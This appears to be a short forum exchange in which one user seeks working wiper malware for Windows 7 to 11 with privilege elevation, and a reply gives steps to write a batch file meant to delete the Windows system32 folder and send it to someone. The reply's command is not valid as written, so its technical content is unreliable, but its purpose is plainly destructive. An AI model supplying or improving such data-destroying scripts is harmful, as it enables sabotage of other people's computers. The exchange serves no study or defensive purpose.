First thing you need to think of is how you’ll get in there in the first place.

I believe there is a lot of wiper malware that has been developed by some past APT groups that are now public.
This is googlable information.
Everyone says it's easy to find, but no one has yet given a working source code. Unfortunately, I don't have anything on my side that works on Windows 7 up to 11 and that requires the least privileges or that has an elevation that works.

1. Open Notepad
2. Create a new text file
3. write @echo off
4. write delete c:\windows\system32
5. save as file.bat

send to someone

Write this to notpad:

@echo off
delete c:\windows\system32

Then save the notepad file as
deleter.bat
